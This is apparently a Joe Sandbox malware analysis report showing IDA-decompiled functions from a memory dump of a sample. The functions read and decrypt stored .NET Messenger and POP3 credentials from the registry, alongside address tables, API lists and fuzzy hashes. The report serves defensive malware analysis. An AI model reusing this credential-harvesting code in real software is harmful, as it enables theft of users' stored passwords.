						if(_t117 - 0x20 <= 0xf) {
							_v44 = _v44 + 1;
						}
						if(_t117 - 0x3a <= 6) {
							_v60 = _v60 + 1;
						}
						if(_t117 - 0x5b <= 5) {
							_v60 = _v60 + 1;
						}
						if(_t117 < 0x7b) {
							L16:
							if(_t117 > 0x7e) {
								goto L17;
							}
						} else {
							if(_t117 > 0x7e) {
								L17:
								_v40 = _v40 + 1;
							} else {
								_v60 = _v60 + 1;
								goto L16;
							}
						}
						if(_t120 != _t104) {
							_t94 = 0;
							if(_v8 <= 0) {
								L27:
								_t94 = _t94 | 0xffffffff;
							} else {
								L21:
								L21:
								if(_t94 < 0 || _t94 >= _v8) {
									_t115 = 0;
								} else {
									_t115 =  *((intOrPtr*)(_v20 + _t94));
								}
								if(_t115 == _t117) {
									goto L28;
								}
								_t94 = _t94 + 1;
								if(_t94 < _v8) {
									goto L21;
								} else {
									goto L27;
								}
							}
							L28:
							_t104 = 0;
							if(_t94 < 0) {
								E004045E8( &_v20, _v64);
								_t98 = abs( *((char*)(_t120 + _t118)) -  *((char*)(_t120 + _t118 - 1)));
								_pop(_t106);
								if(_t98 != 1) {
									_t47 = _t98 - 2; // -2
									_t106 = _t47;
									if(_t106 > 3) {
										if(_t98 < 6) {
											if(_t98 > 0xa) {
												goto L40;
											}
										} else {
											if(_t98 > 0xa) {
												goto L40;
											} else {
												_t159 = _v28 +  *0x414510;
											}
											goto L41;
										}
									} else {
										_t159 = _v28 +  *0x414518;
										goto L41;
									}
								} else {
									_t165 = _v28;
									goto L30;
								}
							} else {
								_t100 = abs(_t117 -  *((char*)(_t120 + _t118 - 1)));
								_t165 = _v28;
								_pop(_t106);
								if(_t100 != 0) {
									_t159 = _t165 +  *0x414520;
								} else {
									L30:
									_t159 = _t165 +  *0x414528;
								}
								goto L41;
							}
						} else {
							E004045E8( &_v20, _v64);
							L40:
							_t159 = _v28 +  *0x414508;
							L41:
							_v28 = _t159;
						}
						_t120 = _t120 + 1;
					} while (_t120 < _v36);
				}
				_v64 = _t104;
				_t80 = 0x1a;
				if(_v56 != _t104) {
					_v64 = _t80;
				}
				if(_v52 != _t104) {
					_v64 = _v64 + _t80;
				}
				if(_v48 != _t104) {
					_v64 = _v64 + 0xa;
				}
				if(_v44 != _t104) {
					_v64 = _v64 + 0x10;
				}
				if(_v60 != _t104) {
					_v64 = _v64 + 0x11;
				}
				if(_v40 != _t104) {
					_v64 = _v64 + 0x1e;
				}
				if(_v64 <= _t104) {
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = 0;
				} else {
					asm("fild dword [esp+0xc]");
					_push(_t106);
					_push(_t106);
					 *_t125 = _t159;
					L004115B8();
					_v36 = _t159;
					 *_t125 =  *0x414500;
					L004115B8();
					asm("fdivr qword [esp+0x30]");
					asm("fistp qword [esp+0x30]");
					_t122 = _v28;
					if(_v20 != _t104) {
						free(_v20);
					}
					_t81 = _t122;
				}
				return _t81;
			}


































                                                                                                                                                    0x00401a50
                                                                                                                                                    0x00401a50
                                                                                                                                                    0x00401a56
                                                                                                                                                    0x00401a5c
                                                                                                                                                    0x00401a61
                                                                                                                                                    0x00401a63
                                                                                                                                                    0x00401a65
                                                                                                                                                    0x00401a69
                                                                                                                                                    0x00401a6d
                                                                                                                                                    0x00401a6e
                                                                                                                                                    0x00401a72
                                                                                                                                                    0x00401a76
                                                                                                                                                    0x00401a7a
                                                                                                                                                    0x00401a7e
                                                                                                                                                    0x00401a82
                                                                                                                                                    0x00401a86
                                                                                                                                                    0x00401a8a
                                                                                                                                                    0x00401a92
                                                                                                                                                    0x00401a96
                                                                                                                                                    0x00401a9a
                                                                                                                                                    0x00401a9e
                                                                                                                                                    0x00401aa4
                                                                                                                                                    0x00401aa4
                                                                                                                                                    0x00401aad
                                                                                                                                                    0x00401ab1
                                                                                                                                                    0x00401ab3
                                                                                                                                                    0x00401ab3
                                                                                                                                                    0x00401abd
                                                                                                                                                    0x00401abf
                                                                                                                                                    0x00401abf
                                                                                                                                                    0x00401ac9
                                                                                                                                                    0x00401acb
                                                                                                                                                    0x00401acb
                                                                                                                                                    0x00401ad5
                                                                                                                                                    0x00401ad7
                                                                                                                                                    0x00401ad7
                                                                                                                                                    0x00401ae1
                                                                                                                                                    0x00401ae3
                                                                                                                                                    0x00401ae3
                                                                                                                                                    0x00401aed
                                                                                                                                                    0x00401aef
                                                                                                                                                    0x00401aef
                                                                                                                                                    0x00401af6
                                                                                                                                                    0x00401b01
                                                                                                                                                    0x00401b04
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401af8
                                                                                                                                                    0x00401afb
                                                                                                                                                    0x00401b06
                                                                                                                                                    0x00401b06
                                                                                                                                                    0x00401afd
                                                                                                                                                    0x00401afd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401afd
                                                                                                                                                    0x00401afb
                                                                                                                                                    0x00401b0c
                                                                                                                                                    0x00401b20
                                                                                                                                                    0x00401b26
                                                                                                                                                    0x00401b48
                                                                                                                                                    0x00401b48
                                                                                                                                                    0x00401b28
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b28
                                                                                                                                                    0x00401b2a
                                                                                                                                                    0x00401b3b
                                                                                                                                                    0x00401b32
                                                                                                                                                    0x00401b36
                                                                                                                                                    0x00401b36
                                                                                                                                                    0x00401b3f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b41
                                                                                                                                                    0x00401b46
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b46
                                                                                                                                                    0x00401b4b
                                                                                                                                                    0x00401b4b
                                                                                                                                                    0x00401b4f
                                                                                                                                                    0x00401b82
                                                                                                                                                    0x00401b93
                                                                                                                                                    0x00401b9b
                                                                                                                                                    0x00401b9c
                                                                                                                                                    0x00401ba4
                                                                                                                                                    0x00401ba4
                                                                                                                                                    0x00401baa
                                                                                                                                                    0x00401bbb
                                                                                                                                                    0x00401bd1
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bbd
                                                                                                                                                    0x00401bc0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bc2
                                                                                                                                                    0x00401bc6
                                                                                                                                                    0x00401bc6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bc0
                                                                                                                                                    0x00401bac
                                                                                                                                                    0x00401bb0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401bb0
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b9e
                                                                                                                                                    0x00401b51
                                                                                                                                                    0x00401b5c
                                                                                                                                                    0x00401b63
                                                                                                                                                    0x00401b67
                                                                                                                                                    0x00401b68
                                                                                                                                                    0x00401b72
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00401b6a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00401b68
                                                                                                                                                    0x00401b0e
                                                                                                                                                    0x00401b16
                                                                                                                                                    0x00401bd3
                                                                                                                                                    0x00401bd7
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401bdd
                                                                                                                                                    0x00401be1
                                                                                                                                                    0x00401be2
                                                                                                                                                    0x00401aa4
                                                                                                                                                    0x00401bf2
                                                                                                                                                    0x00401bf6
                                                                                                                                                    0x00401bf7
                                                                                                                                                    0x00401bf9
                                                                                                                                                    0x00401bf9
                                                                                                                                                    0x00401c01
                                                                                                                                                    0x00401c03
                                                                                                                                                    0x00401c03
                                                                                                                                                    0x00401c0b
                                                                                                                                                    0x00401c0d
                                                                                                                                                    0x00401c0d
                                                                                                                                                    0x00401c16
                                                                                                                                                    0x00401c18
                                                                                                                                                    0x00401c18
                                                                                                                                                    0x00401c21
                                                                                                                                                    0x00401c23
                                                                                                                                                    0x00401c23
                                                                                                                                                    0x00401c2c
                                                                                                                                                    0x00401c2e
                                                                                                                                                    0x00401c2e
                                                                                                                                                    0x00401c37
                                                                                                                                                    0x00401c83
                                                                                                                                                    0x00401c89
                                                                                                                                                    0x00401c8e
                                                                                                                                                    0x00401c8f
                                                                                                                                                    0x00401c39
                                                                                                                                                    0x00401c39
                                                                                                                                                    0x00401c3d
                                                                                                                                                    0x00401c3e
                                                                                                                                                    0x00401c3f
                                                                                                                                                    0x00401c42
                                                                                                                                                    0x00401c47
                                                                                                                                                    0x00401c51
                                                                                                                                                    0x00401c54
                                                                                                                                                    0x00401c5d
                                                                                                                                                    0x00401c67
                                                                                                                                                    0x00401c6b
                                                                                                                                                    0x00401c6f
                                                                                                                                                    0x00401c75
                                                                                                                                                    0x00401c7a
                                                                                                                                                    0x00401c7b
                                                                                                                                                    0x00401c7b
                                                                                                                                                    0x00401c96

                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: free$strlen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 667451143-3916222277
                                                                                                                                                    • Opcode ID: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                                                                                    • Instruction ID: 06eee62d74eb4b55ebb23f84067d794473d6c8b6021198aa51b9bcc42ccbae70
                                                                                                                                                    • Opcode Fuzzy Hash: 37bb09f8b96ce6c60aa0d5a3bd89c5871ef181f1a1b83bd216632f6d31a5aab6
                                                                                                                                                    • Instruction Fuzzy Hash: DA6178704083859FDB249F26948046BBBF1FB85315F54997FF5D2A22A1E738E8468B0B
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D4A6 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 94registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E0040D4A6(char* __ebx, void** _a4) {
				int _v8;
				int _v12;
				int _v16;
				void* _v20;
				int _v24;
				char* _v28;
				char _v32;
				char _v556;
				char _v557;
				char _v1578;
				void _v1580;
				void* __edi;
				void* __esi;
				long _t39;
				int _t43;
				char _t48;
				char* _t63;
				int* _t67;

				_t63 = __ebx;
				_t67 = 0;
				_v16 = 0;
				_v12 = 0x400;
				_t39 = RegQueryValueExA( *_a4, "Password.NET Messenger Service", 0, 0,  &_v1580,  &_v12);
				if(_t39 != 0) {
					L13:
					RegCloseKey( *_a4);
					return _v16;
				}
				_t43 = _t39 + 1;
				if(_v12 <= _t43) {
					goto L13;
				}
				_t74 = _v1580 - 0x20;
				_v8 = 0;
				if(_v1580 >= 0x20) {
					_v8 = _t43;
					L10:
					if(_v8 != _t67) {
						_v557 = 0;
						E00401380( &_v1580,  &(_t63[0x100]), 0xff);
						_v8 = 0xff;
						_t48 = RegQueryValueExA( *_a4, "User.NET Messenger Service", 0, 0, _t63,  &_v8);
						if(_t48 == 0) {
							_t63[0xfe] = _t48;
							_t63[0x1fe] = _t48;
							_v16 = 1;
						}
					}
					goto L13;
				}
				_t69 =  &_v556;
				E004046D7( &_v556);
				if(E004047A0(_t69, _t74) == 0) {
					L8:
					E004047F1( &_v556);
					_t67 = 0;
					goto L10;
				}
				_v32 = _v12 + 0xfffffffe;
				_v28 =  &_v1578;
				if(E00404811(_t69,  &_v32, 0,  &_v24) == 0) {
					goto L8;
				}
				if(_v24 < 0x400) {
					memcpy( &_v1580, _v20, _v24);
					_v8 = 1;
				}
				LocalFree(_v20);
				goto L8;
			}





















                                                                                                                                                    0x0040d4a6
                                                                                                                                                    0x0040d4bf
                                                                                                                                                    0x0040d4cf
                                                                                                                                                    0x0040d4d2
                                                                                                                                                    0x0040d4d5
                                                                                                                                                    0x0040d4dd
                                                                                                                                                    0x0040d5c7
                                                                                                                                                    0x0040d5cc
                                                                                                                                                    0x0040d5d8
                                                                                                                                                    0x0040d5d8
                                                                                                                                                    0x0040d4e3
                                                                                                                                                    0x0040d4e7
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d4ed
                                                                                                                                                    0x0040d4f4
                                                                                                                                                    0x0040d4f7
                                                                                                                                                    0x0040d56d
                                                                                                                                                    0x0040d570
                                                                                                                                                    0x0040d573
                                                                                                                                                    0x0040d587
                                                                                                                                                    0x0040d58e
                                                                                                                                                    0x0040d5a7
                                                                                                                                                    0x0040d5aa
                                                                                                                                                    0x0040d5b2
                                                                                                                                                    0x0040d5b4
                                                                                                                                                    0x0040d5ba
                                                                                                                                                    0x0040d5c0
                                                                                                                                                    0x0040d5c0
                                                                                                                                                    0x0040d5b2
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d573
                                                                                                                                                    0x0040d4f9
                                                                                                                                                    0x0040d4ff
                                                                                                                                                    0x0040d50b
                                                                                                                                                    0x0040d55e
                                                                                                                                                    0x0040d564
                                                                                                                                                    0x0040d569
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d569
                                                                                                                                                    0x0040d513
                                                                                                                                                    0x0040d51c
                                                                                                                                                    0x0040d532
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0040d537
                                                                                                                                                    0x0040d546
                                                                                                                                                    0x0040d54e
                                                                                                                                                    0x0040d54e
                                                                                                                                                    0x0040d558
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,Password.NET Messenger Service,00000000,00000000,?,?,80000001,7554F420), ref: 0040D4D5
                                                                                                                                                    • RegQueryValueExA.ADVAPI32(?,User.NET Messenger Service,00000000,00000000,?,?), ref: 0040D5AA
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • memcpy.MSVCRT ref: 0040D546
                                                                                                                                                    • LocalFree.KERNEL32(?,?,00000000,?), ref: 0040D558
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 0040D5CC
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$AddressCloseFreeLibraryLoadLocalProcmemcpystrcpy
                                                                                                                                                    • String ID: $Password.NET Messenger Service$User.NET Messenger Service
                                                                                                                                                    • API String ID: 3289975857-105384665
                                                                                                                                                    • Opcode ID: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                                                                    • Instruction ID: 7f1cec63b8765f81c3836bbc11e71f1516ceea0880c28a2d93855dc55ce36bd3
                                                                                                                                                    • Opcode Fuzzy Hash: d83e2ebe096d5bcd78dc6c5e473717e98c5fc49575dad68c24a229f0531786f0
                                                                                                                                                    • Instruction Fuzzy Hash: AE314DB1D01219AFDB11DF94CC44BDEBBB9AF48318F1040B6E905B7290D6789B94CF99
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040706C Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 90COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 89%
                                                                                                                                                    			E0040706C(void* __ecx, intOrPtr* _a4, intOrPtr _a8, char _a12) {
				char _v12;
				short* _v16;
				char _v20;
				char* _v24;
				char _v28;
				char _v288;
				char _v544;
				char _v800;
				char _v1056;
				char _v1584;
				void _v2607;
				char _v2608;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t36;
				void* _t63;
				char* _t66;
				void* _t68;

				_t63 = __ecx;
				_v2608 = 0;
				memset( &_v2607, 0, 0x3ff);
				_v12 = 0x400;
				_v1056 = 0;
				_v800 = 0;
				_v544 = 0;
				_v288 = 0;
				_t36 = E0040EBA3(_t63, _a8, "POP3_credentials",  &_v2608,  &_v12);
				_t72 = _t36;
				if(_t36 != 0) {
					return _t36;
				}
				_t67 =  &_v1584;
				E004046D7( &_v1584);
				if(E004047A0( &_v1584, _t72) != 0) {
					_v24 =  &_v2608;
					_v28 = _v12;
					_t16 =  &_v20; // 0x407221
					if(E00404811(_t67,  &_v28, 0, _t16) != 0) {
						_t19 =  &_v20; // 0x407221
						 *((char*)(_t68 + WideCharToMultiByte(0, 0, _v16,  *_t19 >> 1,  &_v544, 0xfd, 0, 0) - 0x21c)) = 0;
						LocalFree(_v16);
						E0040EB80(0xff, _t63, _a8, "POP3_name",  &_v800);
						E0040EB80(0xff, _t63, _a8, "POP3_host",  &_v288);
						_t28 =  &_a12; // 0x407221
						_t66 =  &_v1056;
						E004060D0(0xff, _t66,  *_t28);
						 *((intOrPtr*)( *_a4))(_t66);
					}
				}
				return E004047F1( &_v1584);
			}






















                                                                                                                                                    0x0040706c
                                                                                                                                                    0x00407087
                                                                                                                                                    0x0040708d
                                                                                                                                                    0x004070a5
                                                                                                                                                    0x004070ac
                                                                                                                                                    0x004070b2
                                                                                                                                                    0x004070b8
                                                                                                                                                    0x004070be
                                                                                                                                                    0x004070c4
                                                                                                                                                    0x004070cc
                                                                                                                                                    0x004070ce
                                                                                                                                                    0x00407199
                                                                                                                                                    0x00407199
                                                                                                                                                    0x004070d4
                                                                                                                                                    0x004070da
                                                                                                                                                    0x004070e6
                                                                                                                                                    0x004070f2
                                                                                                                                                    0x004070f8
                                                                                                                                                    0x004070fb
                                                                                                                                                    0x0040710d
                                                                                                                                                    0x0040711d
                                                                                                                                                    0x00407131
                                                                                                                                                    0x00407138
                                                                                                                                                    0x00407154
                                                                                                                                                    0x0040716a
                                                                                                                                                    0x0040716f
                                                                                                                                                    0x00407172
                                                                                                                                                    0x00407178
                                                                                                                                                    0x00407188
                                                                                                                                                    0x00407188
                                                                                                                                                    0x0040710d
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • memset.MSVCRT ref: 0040708D
                                                                                                                                                      • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                                                                                      • Part of subcall function 004046D7: strcpy.MSVCRT ref: 00404726
                                                                                                                                                      • Part of subcall function 004047A0: LoadLibraryA.KERNELBASE(?,0040D60E,80000001,7554F420), ref: 004047A8
                                                                                                                                                      • Part of subcall function 004047A0: GetProcAddress.KERNEL32(00000000,?), ref: 004047C0
                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,!r@,?,000000FD,00000000,00000000,?,00000000,!r@,?,?,?,?,00000000), ref: 00407128
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,?,?,00000000,7554ED80,?), ref: 00407138
                                                                                                                                                      • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: QueryValue$AddressByteCharFreeLibraryLoadLocalMultiProcWidememcpymemsetstrcpystrlen
                                                                                                                                                    • String ID: !r@$!r@$POP3_credentials$POP3_host$POP3_name
                                                                                                                                                    • API String ID: 604216836-250559020
                                                                                                                                                    • Opcode ID: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                                                                                    • Instruction ID: f8ca724a3b3a12fba31c48434a973b8369f3aae8d57bdfed2f45406e53e98f37
                                                                                                                                                    • Opcode Fuzzy Hash: 88d4546f94300e18eb63e1a28018ddb3fc5fe9f294d301ab42fb72424ac45106
                                                                                                                                                    • Instruction Fuzzy Hash: C331707194021CAFDB11EB698C81ADE7BBCEF19344F0084B6FA05A2281D6389B598F65
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00405E46 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52stringlibrarywindowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 68%
                                                                                                                                                    			E00405E46(long __edi, char* _a4) {
				char _v8;
				void* _t8;
				void* _t10;
				long _t14;
				long _t24;

				_t24 = __edi;
				_t1 = _t24 - 0x834; // -2100
				_t8 = 0;
				_t14 = 0x1100;
				if(_t1 <= 0x383) {
					_t8 = LoadLibraryExA("netmsg.dll", 0, 2);
					if(0 != 0) {
						_t14 = 0x1900;
					}
				}
				if(FormatMessageA(_t14, _t8, _t24, 0x400,  &_v8, 0, 0) <= 0) {
					_t10 = strcpy(_a4, "Unknown Error");
				} else {
					if(strlen(_v8) < 0x400) {
						strcpy(_a4, _v8);
					}
					_t10 = LocalFree(_v8);
				}
				return _t10;
			}








                                                                                                                                                    0x00405e46
                                                                                                                                                    0x00405e4c
                                                                                                                                                    0x00405e54
                                                                                                                                                    0x00405e5c
                                                                                                                                                    0x00405e61
                                                                                                                                                    0x00405e6b
                                                                                                                                                    0x00405e73
                                                                                                                                                    0x00405e75
                                                                                                                                                    0x00405e75
                                                                                                                                                    0x00405e73
                                                                                                                                                    0x00405e91
                                                                                                                                                    0x00405ec0
                                                                                                                                                    0x00405e93
                                                                                                                                                    0x00405e9e
                                                                                                                                                    0x00405ea6
                                                                                                                                                    0x00405eac
                                                                                                                                                    0x00405eb0
                                                                                                                                                    0x00405eb0
                                                                                                                                                    0x00405eca

                                                                                                                                                    APIs
                                                                                                                                                    • LoadLibraryExA.KERNEL32(netmsg.dll,00000000,00000002,?,00000000,?,?,00405F65,?,?), ref: 00405E6B
                                                                                                                                                    • FormatMessageA.KERNEL32(00001100,00000000,00000000,00000400,?,00000000,00000000,?,00000000,?,?,00405F65,?,?), ref: 00405E89
                                                                                                                                                    • strlen.MSVCRT ref: 00405E96
                                                                                                                                                    • strcpy.MSVCRT(?,?,?,?,00405F65,?,?), ref: 00405EA6
                                                                                                                                                    • LocalFree.KERNEL32(?,?,?,00405F65,?,?), ref: 00405EB0
                                                                                                                                                    • strcpy.MSVCRT(?,Unknown Error,?,?,00405F65,?,?), ref: 00405EC0
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 0000000F.00000002.339863709.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 0000000F.00000002.339880590.0000000000418000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_15_2_400000_vbc.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: strcpy$FormatFreeLibraryLoadLocalMessagestrlen
                                                                                                                                                    • String ID: Unknown Error$netmsg.dll
                                                                                                                                                    • API String ID: 3198317522-572158859
                                                                                                                                                    • Opcode ID: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                                                                                    • Instruction ID: 3a45a8761f4bc18c8cc8ce1e33cdf84813ecacbbbbff7bb38409c5e389e3efd7
                                                                                                                                                    • Opcode Fuzzy Hash: be691a346cef5d5e24c515aac1ca35402bb88184c6041fe02f13b1b1e364655c
                                                                                                                                                    • Instruction Fuzzy Hash: A901B131604118BAE7155B61ED46EDF7E6DDB14792B20443AF602F00A0DA785F409A98
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040875C Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                                    			E0040875C(void* __eax, void* __eflags, signed int _a4, short _a8) {
				char _v8;
				signed int _v12;
				signed int _v16;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t96;
				signed int _t98;
				void* _t99;
				signed int _t104;
				signed short _t107;
				signed int _t110;
				intOrPtr _t114;
				signed int _t117;
				signed int _t119;
				signed short _t121;
				signed int _t122;
				signed int _t152;
				signed int _t156;
				signed int _t158;
				signed int _t161;
				signed int _t163;
				signed int _t168;
				signed int _t169;
				signed int _t170;
				void* _t172;
				void* _t173;
				void* _t174;
				void* _t178;
				intOrPtr _t180;

				_t174 = __eflags;
				_t172 = __eax;
				E00408572(__eax);
				 *(_t172 + 0x2c) =  *(_t172 + 0x2c) & 0x00000000;
				_t122 = 0xd;
				 *((intOrPtr*)(_t172 + 0x184)) = _a4;
				_t156 = 0x14;
				_t96 = _t122 * _t156;
				 *(_t172 + 0x1b0) = _t122;
				_push( ~(0 | _t174 > 0x00000000) | _t96);
				L004115D0();
				 *(_t172 + 0x1b4) = _t96;
				_t158 = 0x10;
				_t98 = _t122 * _t158;
				_push( ~(0 | _t174 > 0x00000000) | _t98);
				L004115D0();
				 *(_t172 + 0x34) = _t98;
				_v8 = 0x4168e0;
				do {
					_t21 =  &_v8; // 0x4168e0
					_t99 =  *_t21;
					_t168 =  *_t99;
					_v12 = _t168;
					_t169 = _t168 * 0x14;
					memcpy( *(_t172 + 0x1b4) + _t169, _t99, 0x14);
					_t24 =  &_v8; // 0x4168e0
					_t104 = _v12 << 4;
					_v12 = _t104;
					memcpy( *(_t172 + 0x34) + _t104,  *_t24 + 0x14, 0x10);
					_t107 =  *(_t169 +  *(_t172 + 0x1b4) + 0x10);
					_t173 = _t173 + 0x18;
					_v16 = _t107;
					 *((intOrPtr*)( *(_t172 + 0x34) + _v12 + 0xc)) = _t107;
					if((_t107 & 0xffff0000) == 0) {
						 *(_t169 +  *(_t172 + 0x1b4) + 0x10) = E004078FF(_t107 & 0x0000ffff);
						_t121 = E004078FF(_v16 | 0x00010000);
						 *( *(_t172 + 0x34) + _v12 + 0xc) = _t121;
						_t122 = 0xd;
					}
					_v8 = _v8 + 0x24;
					_t178 = _v8 - 0x416ab4;
				} while (_t178 < 0);
				 *(_t172 + 0x38) =  *(_t172 + 0x38) & 0x00000000;
				 *((intOrPtr*)(_t172 + 0x3c)) = _a8;
				_t161 = 4;
				_t110 = _t122 * _t161;
				 *(_t172 + 0x20) = _t122;
				 *((intOrPtr*)(_t172 + 0x1c)) = 0x20;
				_push( ~(0 | _t178 > 0x00000000) | _t110);
				L004115D0();
				_push(0xc);
				 *(_t172 + 0x24) = _t110;
				L004115D0();
				_t170 = _t110;
				if(_t170 == 0) {
					_t170 = 0;
					__eflags = 0;
				} else {
					_t114 =  *((intOrPtr*)(_t172 + 0x48));
					_t180 = _t114;
					_a8 = _t114;
					if(_t180 == 0) {
						_a8 = 0x64;
					}
					 *((intOrPtr*)(_t170 + 8)) = _a4;
					_t163 = 4;
					_t117 = _t122 * _t163;
					 *(_t170 + 4) = _t122;
					_push( ~(0 | _t180 > 0x00000000) | _t117);
					L004115D0();
					_a4 = _a4 & 0x00000000;
					 *_t170 = _t117;
					do {
						_t152 = _a4;
						_t119 = _t152 << 2;
						_a4 = _a4 + 1;
						 *( *_t170 + _t119 + 2) = _t152;
						 *((short*)(_t119 +  *_t170)) = _a8;
					} while (_a4 < _t122);
				}
				 *(_t172 + 0x19c) =  *(_t172 + 0x19c) & 0x00000000;
				 *(_t172 + 0x1a0) = _t170;
				 *((intOrPtr*)(_t172 + 0x40)) = 1;
				 *((intOrPtr*)(_t172 + 0x198)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a4)) = 1;
				 *((intOrPtr*)(_t172 + 0x1a8)) = 1;
				 *((intOrPtr*)(_t172 + 0x1c4)) = 0x32;
				return E004086DC(_t172);
			}

































                                                                                                                                                    0x0040875c
                                                                                                                                                    0x00408765
                                                                                                                                                    0x00408767
                                                                                                                                                    0x0040876f
                                                                                                                                                    0x00408775
                                                                                                                                                    0x00408776
                                                                                                                                                    0x00408780
                                                                                                                                                    0x00408783
                                                                                                                                                    0x00408788
                                                                                                                                                    0x00408792
                                                                                                                                                    0x00408793
                                                                                                                                                    0x00408798
                                                                                                                                                    0x004087a2
                                                                                                                                                    0x004087a5
                                                                                                                                                    0x004087ae
                                                                                                                                                    0x004087af
